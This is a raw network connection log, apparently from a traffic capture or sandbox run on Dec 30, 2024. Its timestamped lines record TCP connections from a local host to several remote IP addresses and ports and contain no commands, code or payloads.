                                                                                                                                                                    Dec 30, 2024 04:59:52.910377979 CET49971443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:52.944844961 CET49971443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:52.944863081 CET44349971142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:52.945945978 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:52.946027040 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:52.946104050 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:52.946297884 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:52.946332932 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.318619967 CET44349972142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.318736076 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.365572929 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.365580082 CET44349972142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.365843058 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.365847111 CET44349972142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.372601986 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.372673988 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.373157024 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.373162985 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.373327017 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.373332977 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.393517017 CET44349974142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.393573046 CET49974443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.401515961 CET49974443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.401520014 CET44349974142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.401664019 CET49974443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.401667118 CET44349974142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.553328991 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.553421974 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.554549932 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.554579973 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.554691076 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.554702044 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.768990040 CET44349974142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.769072056 CET44349974142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.769258976 CET49974443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.769450903 CET49974443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.769459009 CET44349974142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.769860983 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.769886971 CET44349979142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.772953987 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.773160934 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.773175001 CET44349979142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.777832031 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.777892113 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.777952909 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.777967930 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.778006077 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.778011084 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.778049946 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.778053999 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.778088093 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.778098106 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.778136015 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.778543949 CET49973443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.778557062 CET44349973142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.778892994 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.778940916 CET44349980142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.779026031 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.779251099 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.779262066 CET44349980142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.791573048 CET44349972142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.792282104 CET44349972142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.792356014 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792417049 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792428017 CET44349972142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.792437077 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792804956 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792823076 CET49972443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.792893887 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.796932936 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.797286034 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:53.797326088 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.988748074 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.988792896 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.988818884 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.988867998 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.988900900 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989015102 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989171982 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.989207029 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.989228964 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989253998 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989449024 CET49976443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989476919 CET44349976142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.989814043 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.989835978 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:53.989897013 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.990076065 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:53.990089893 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.424972057 CET44349979142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.425029039 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.425400972 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.425410986 CET44349979142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.427198887 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.427202940 CET44349979142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.432807922 CET44349980142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.432862997 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.433190107 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.433198929 CET44349980142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.436206102 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.436212063 CET44349980142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.461256027 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.461343050 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.461673975 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.461695910 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.461873055 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.461886883 CET44349981142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.637492895 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.637697935 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.638190985 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.638196945 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.638328075 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.638333082 CET44349982142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.766140938 CET49979443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.766144991 CET49980443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.766144991 CET49982443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 04:59:54.766153097 CET49981443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.766787052 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.766858101 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.766942024 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.767561913 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.767595053 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.768696070 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.768723965 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:54.768815041 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.769020081 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:54.769046068 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.376641035 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.376933098 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.381505966 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.381539106 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.385505915 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.386219978 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.386279106 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.386296034 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.420150042 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.420186996 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.420325041 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.420337915 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.834541082 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.834872961 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.835455894 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.835505962 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.835558891 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.859505892 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.859570980 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.859606028 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.859658003 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 04:59:55.860140085 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.860167027 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 04:59:55.860218048 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.391654968 CET49983443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.391694069 CET44349983142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.391928911 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.391949892 CET44349984142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.391974926 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.392008066 CET49984443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.395895958 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.395929098 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.396090984 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.396111012 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.396162987 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.396231890 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.396960974 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.396969080 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.397188902 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.397211075 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.397223949 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.398309946 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.398344994 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.398354053 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.398509979 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.398523092 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.398683071 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:06.398694038 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.398742914 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:06.398757935 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.998791933 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:06.999383926 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:07.000771046 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:07.001683950 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:07.001745939 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:07.001750946 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:07.006737947 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:07.007129908 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:08.281543970 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:08.286293983 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:08.580519915 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:08.625236034 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:08.790472984 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:08.795264959 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.599848032 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:15.599864006 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.600060940 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:15.600070000 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.600311041 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:15.600315094 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.600632906 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:15.600658894 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.600687027 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:15.600718021 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.600863934 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:15.600871086 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.600967884 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:15.600970984 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:15.600972891 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.600975037 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.930350065 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.930413008 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:15.930432081 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.930471897 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:15.931235075 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.931260109 CET44350048142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:15.931273937 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:15.931297064 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:16.014422894 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.014473915 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.014554024 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:16.014573097 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.014585972 CET44350047142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.014620066 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:16.015743971 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.015779972 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.015825987 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:16.015831947 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.015862942 CET44350045142.250.186.129192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.015880108 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:16.015903950 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:16.069242954 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.069322109 CET44350046142.250.181.238192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:16.069413900 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:28.548301935 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:28.553082943 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:28.842988968 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:28.984679937 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:29.005835056 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:29.010626078 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:29.435635090 CET4974380192.168.2.469.42.215.252
                                                                                                                                                                    Dec 30, 2024 05:00:29.438714027 CET50045443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:29.438862085 CET50046443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:29.438909054 CET50047443192.168.2.4142.250.186.129
                                                                                                                                                                    Dec 30, 2024 05:00:29.438914061 CET50048443192.168.2.4142.250.181.238
                                                                                                                                                                    Dec 30, 2024 05:00:45.595613956 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:45.595668077 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:45.600513935 CET1909149785118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:45.603331089 CET4978519091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:47.532764912 CET5026319092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:47.537647963 CET1909250263118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:47.539118052 CET5026319092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:51.142138004 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:51.142168045 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:51.578552961 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:51.579349041 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:52.281656981 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:52.281656981 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:53.509345055 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:53.509351015 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:55.984791040 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:55.984814882 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:00:56.691174030 CET5026319092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:56.696099997 CET1909250263118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:56.696113110 CET1909250263118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:56.696120977 CET1909250263118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:56.696247101 CET1909250263118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:57.196049929 CET1909250263118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:00:57.197431087 CET5026319092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:00:57.202229977 CET1909250263118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:00.984839916 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:01:00.984849930 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:01:07.329370022 CET5026319092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:07.329571009 CET5026319092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:07.334254980 CET1909250263118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:07.334362030 CET5026319092192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:09.279342890 CET5026419091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:09.284303904 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:09.284382105 CET5026419091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:10.672369957 CET4977480192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:01:10.672374964 CET4979380192.168.2.4180.163.251.230
                                                                                                                                                                    Dec 30, 2024 05:01:18.643640995 CET5026419091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:18.648655891 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:18.648670912 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:18.648679972 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:18.648803949 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:19.157906055 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:19.158224106 CET5026419091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:19.163088083 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:28.204806089 CET5026419091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:28.209666967 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:28.505079985 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:28.650506973 CET5026419091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:28.655502081 CET1909150264118.107.44.219192.168.2.4
                                                                                                                                                                    Dec 30, 2024 05:01:45.453959942 CET5026419091192.168.2.4118.107.44.219
                                                                                                                                                                    Dec 30, 2024 05:01:45.454185009 CET5026419091192.168.2.4118.107.44.219
